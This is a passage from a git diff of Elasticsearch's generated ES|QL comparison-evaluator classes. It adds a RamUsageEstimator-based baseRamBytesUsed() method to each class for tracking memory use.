org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanOrEqualDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java index 9ae1c86788d86..ae37b8a9124b2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanOrEqualIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java index e4fba4970409b..6b1ea2be71bff 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanOrEqualKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java index 085e41ec5fc20..00f638132043d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanOrEqualLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java index ffb411ca82d42..c51b15301202c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanOrEqualMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java index 1419308f4ba4a..088538ad41416 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/GreaterThanOrEqualNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class GreaterThanOrEqualNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(GreaterThanOrEqualNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java index 1199a9d5ab7d1..03bc373bd2559 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsConstantEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.automaton.ByteRunAutomaton; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class InsensitiveEqualsConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InsensitiveEqualsConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -55,6 +58,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java index 8c7abcfe891d5..ee758e218a7c2 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InsensitiveEqualsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
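One asymmetry in this family: the new baseRamBytesUsed() in InsensitiveEqualsConstantEvaluator adds only lhs.baseRamBytesUsed(), apparently because its right-hand side is a precompiled constant (note the ByteRunAutomaton import) rather than a child ExpressionEvaluator, while the non-constant InsensitiveEqualsEvaluator just below adds both lhs and rhs as usual.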
*/ public final class InsensitiveEqualsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InsensitiveEqualsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java index 7f0b7e8f66b66..6ef61e2519f1b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java index cd0997a513c85..f447355bc294a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java index e88a9ae30d00b..4be8ca10e2517 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java index 5377441b5e8b5..b8b3a3ef70f00 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java index dd63a3c364cd3..3ec8c00b87e88 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java index 317a861b16ded..4f57a992520de 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java index bcfe416941b33..03d9962f2a591 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanOrEqualDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java index 83a8b4abc1c4d..167bd7ad6b58d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanOrEqualIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java index 13e6b336286aa..fc4371480857f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanOrEqualKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java index 0e01abc93ce82..934c2858820c9 